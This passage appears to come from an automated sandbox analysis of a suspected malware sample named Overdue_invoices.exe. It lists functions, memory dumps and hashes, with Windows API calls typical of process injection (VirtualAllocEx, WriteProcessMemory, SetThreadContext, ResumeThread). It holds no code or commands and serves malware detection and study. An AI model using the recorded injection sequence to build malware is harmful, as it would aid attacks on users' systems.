                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: c18698828029c135bf093d7b24c950cdedfe2bc78ff9736bfc0c2a9594ec8ce6
                                                      • Instruction ID: 19408ff17ff96904b212fdbc69ae0ed99b34bebff2ae05c710e0f5b0890cbef4
                                                      • Opcode Fuzzy Hash: c18698828029c135bf093d7b24c950cdedfe2bc78ff9736bfc0c2a9594ec8ce6
                                                      • Instruction Fuzzy Hash: 73914971D00219DFDF10DFA4C8817EEBBB2BB48314F1585AAE81AA7380DB749985CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00ADC218, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00ADC2A8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 9ab3a96724198716abc69a203d72bec6ebebf0575c35d175c2ccc6ec1b8ef0d9
                                                      • Instruction ID: 69ccb71937e51443c5c48f54a5624af3736fcb89342ee19b0a6e8e33d6a5e295
                                                      • Opcode Fuzzy Hash: 9ab3a96724198716abc69a203d72bec6ebebf0575c35d175c2ccc6ec1b8ef0d9
                                                      • Instruction Fuzzy Hash: 2A2113719002599FCF10DFAAC884BDEBBF5FF48324F50842AE919A7340D778A954CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00ADB678, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetThreadContext.KERNELBASE(?,00000000), ref: 00ADB6F6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      • Opcode ID: 5647f04c1098f7792189cec19dea49deafc64d41d26031185e4ac73393c7ccbd
                                                      • Instruction ID: ef6ff3282db23194ae118e1bc6d6d28be1c3a799f99d07ecbac70bad8db35265
                                                      • Opcode Fuzzy Hash: 5647f04c1098f7792189cec19dea49deafc64d41d26031185e4ac73393c7ccbd
                                                      • Instruction Fuzzy Hash: 9C2115719002098FCB10DFAAC4847EEBBF4AF88364F55842AE519A7341DB78A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00ADB670, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetThreadContext.KERNELBASE(?,00000000), ref: 00ADB6F6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      • Opcode ID: 2962f3d9031889d2c38109a825909edb359e5631c4060f6b5ef124860b416a77
                                                      • Instruction ID: 8bda40a3b29c91179348f027f7e543377357043d1bd0a6a7c9496e01e1fd553c
                                                      • Opcode Fuzzy Hash: 2962f3d9031889d2c38109a825909edb359e5631c4060f6b5ef124860b416a77
                                                      • Instruction Fuzzy Hash: 742138719003098FCB10DFAAC4847EEBBF4AF48364F55842ED519A7341DB78A945CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00ADC908, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00ADC988
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 01dfe9d10225ae910b618bc5cd766e445e9873141125387998ebe60553c96587
                                                      • Instruction ID: 3ef52e3f8dc3d513700482715a8d26a9c18b4fe5e4aaa02d8e8dd470403491e2
                                                      • Opcode Fuzzy Hash: 01dfe9d10225ae910b618bc5cd766e445e9873141125387998ebe60553c96587
                                                      • Instruction Fuzzy Hash: AB2128719003499FCF10DFAAC880ADEBBF5FF48324F50842AE519A7240D7799954CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00ADC901, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00ADC988
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 1783416f76e73a18b8e7aa9e023327bede45c9b262a6d6b8d0294deee681ecfc
                                                      • Instruction ID: a81302565a5001f970341a5531a44e8097141da13d0d3bc02982066c263cfc9a
                                                      • Opcode Fuzzy Hash: 1783416f76e73a18b8e7aa9e023327bede45c9b262a6d6b8d0294deee681ecfc
                                                      • Instruction Fuzzy Hash: 942128B19003498FCF10DFA9C8806EEBBF5FF48324F55882EE519A7240C7799955DBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00ADBF58, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00ADBFC6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: b76d749e1eb090f8609365f5e43e34ea039fb4398530885682ca4f8d34b1da60
                                                      • Instruction ID: d6a009567c7ececc5aabc443096a27561e8fb63bc3a807f08ad2bfed35cc2466
                                                      • Opcode Fuzzy Hash: b76d749e1eb090f8609365f5e43e34ea039fb4398530885682ca4f8d34b1da60
                                                      • Instruction Fuzzy Hash: B21137719002499FCF10DFAAC844BDFBBF5AF48324F15881AE519A7250CB75A954CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00ADBF50, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00ADBFC6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: e913d250501231dfea6441c205157bf3d02b851c9f4838fe4cf0b5ae7f0c5ddf
                                                      • Instruction ID: 36b9f8663d4d808e189eb4e2d95a8a7939fde9b2067890a616eea1d219929c12
                                                      • Opcode Fuzzy Hash: e913d250501231dfea6441c205157bf3d02b851c9f4838fe4cf0b5ae7f0c5ddf
                                                      • Instruction Fuzzy Hash: B81197728002488FCF10DFA9C8447EEBBF5AF48324F24881AE519A7650C775A950CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00ADD4D0, Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: e1406e125f17c9c0e527b4c2a1df0b7ebcf406817fcfda774458d571e7eb1833
                                                      • Instruction ID: 7db1bef9c318716939a5e811cd04d2ff672f3c99cd66868c59b8dc346e725473
                                                      • Opcode Fuzzy Hash: e1406e125f17c9c0e527b4c2a1df0b7ebcf406817fcfda774458d571e7eb1833
                                                      • Instruction Fuzzy Hash: D3116D71D003098FCB10DFAAD4447EEBBF5AB88324F24891ED519A7350CB75A944CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00ADD4D8, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 82a6cca0aaeda8a8f9be186d7e340dc660c26a162bb44be1dba664b84d20a116
                                                      • Instruction ID: 7e314e636fef0c706fa6682d5abad4a06d7dc3f9da81d3915de0259d07bbb21d
                                                      • Opcode Fuzzy Hash: 82a6cca0aaeda8a8f9be186d7e340dc660c26a162bb44be1dba664b84d20a116
                                                      • Instruction Fuzzy Hash: 65113A719002498BCB10DFAAD8447DEFBF4AB88328F24881AD519A7340DB75A944CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 009FD3DC, Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230033785.00000000009FD000.00000040.00000001.sdmp, Offset: 009FD000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 012218a497af080e05c6b4664390e10f6450ee8780fac885f3d178905ab1ff7f
                                                      • Instruction ID: d2a957a99906c42ddf635966105fed7b5cdae26f911ad2819c43f079f8168538
                                                      • Opcode Fuzzy Hash: 012218a497af080e05c6b4664390e10f6450ee8780fac885f3d178905ab1ff7f
                                                      • Instruction Fuzzy Hash: 16213A71504208DFDF04EF14D9C0B36BB6BFB94324F24C569EA094B296C33AE856D7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 009FD3D7, Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230033785.00000000009FD000.00000040.00000001.sdmp, Offset: 009FD000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: db75533cb9b6fa6099b867bfc3a53cb548d3d4cf5ca75b8a66c096981064a356
                                                      • Instruction ID: 502e0d83c1173d62267b6a601ddd1740400f7a74006b0d80f1875795a7a2babb
                                                      • Opcode Fuzzy Hash: db75533cb9b6fa6099b867bfc3a53cb548d3d4cf5ca75b8a66c096981064a356
                                                      • Instruction Fuzzy Hash: 7111E676404284DFCF01DF14D5C4B26BF72FB94324F24C6A9D9080B666C33AE85ACBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Analysis Process: Overdue_invoices.exe PID: 6020 Parent PID: 5328 Overdue_invoices.exeCOMMON

                                                      Executed Functions

                                                      Function 07EF8A38, Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.631004529.0000000007EF0000.00000040.00000001.sdmp, Offset: 07EF0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d4264f4044861948ad2b10aa3c3ad00dd05f5c326459f97c0d35681bc65c1ffe
                                                      • Instruction ID: 6528fd890be569142bbc3f79bcde56a284a7cc173f3f54f073fb4c4e43d17b30
                                                      • Opcode Fuzzy Hash: d4264f4044861948ad2b10aa3c3ad00dd05f5c326459f97c0d35681bc65c1ffe
                                                      • Instruction Fuzzy Hash: D0F17EB0A0120ACFDB14DFA5C884B9DBBF2FF48308F549569E509AB695DB71E845CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07EF4ED9, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,07EF4EB9,00000800), ref: 07EF4F4A
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.631004529.0000000007EF0000.00000040.00000001.sdmp, Offset: 07EF0000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 455eb67d3ac4e11f0c3b363a61a819fcfd4412f5b3f3c6eedccebc8797bb91e7
                                                      • Instruction ID: 85250853892edf1f668f6481f402f1bcf52d6ec7fdec209d0d8d5e75d0ec13c9
                                                      • Opcode Fuzzy Hash: 455eb67d3ac4e11f0c3b363a61a819fcfd4412f5b3f3c6eedccebc8797bb91e7
                                                      • Instruction Fuzzy Hash: B31156B6D002499FCB10DFAAD884BDEFBF4EB89324F10842AE519A7740C375A544CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07EF4024, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,07EF4EB9,00000800), ref: 07EF4F4A
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.631004529.0000000007EF0000.00000040.00000001.sdmp, Offset: 07EF0000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 43f4d2ebf252a91eb4faa600b3afdd1ed2030b7df713a9781db4120f87189986
                                                      • Instruction ID: 4e23fdb889316c747c3322211c0bfbdc5b30e278f3d2e38bcfdde37cb7212076
                                                      • Opcode Fuzzy Hash: 43f4d2ebf252a91eb4faa600b3afdd1ed2030b7df713a9781db4120f87189986
                                                      • Instruction Fuzzy Hash: 391130B69002498FCB10DFAAD844BDEFBF4AB89324F11842AE519A7640C375A944CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07EF7D58, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OleInitialize.OLE32(00000000), ref: 07EF8875
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.631004529.0000000007EF0000.00000040.00000001.sdmp, Offset: 07EF0000, based on PE: false
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID:
                                                      • API String ID: 2538663250-0
                                                      • Opcode ID: 643edb0c1419d42e96f04b4a97f7995b67ffe82034d09799907b11edec3bf588
                                                      • Instruction ID: a3b5bf2f2478b48f8a4553e6874014ff04df4b74f01f6c7649101fb2670c1fca
                                                      • Opcode Fuzzy Hash: 643edb0c1419d42e96f04b4a97f7995b67ffe82034d09799907b11edec3bf588
                                                      • Instruction Fuzzy Hash: E41145B0D002488FCB10DF9AC448BDEBBF4EB48324F248429E519B7700C374A944CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07EF8818, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OleInitialize.OLE32(00000000), ref: 07EF8875
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.631004529.0000000007EF0000.00000040.00000001.sdmp, Offset: 07EF0000, based on PE: false
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID:
                                                      • API String ID: 2538663250-0
                                                      • Opcode ID: 081147b1bcb6df6918b2ab904b0df6db3435cea6115e2886dd516f65f361369c
                                                      • Instruction ID: c7a653de0b0648021b1c43c74bcada21df57aebd9358474e4e1af476a79d4e0d
                                                      • Opcode Fuzzy Hash: 081147b1bcb6df6918b2ab904b0df6db3435cea6115e2886dd516f65f361369c
                                                      • Instruction Fuzzy Hash: 601133B59002888FCB10DFAAD445BDEBBF4EB48324F24841AE558A7700C374A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions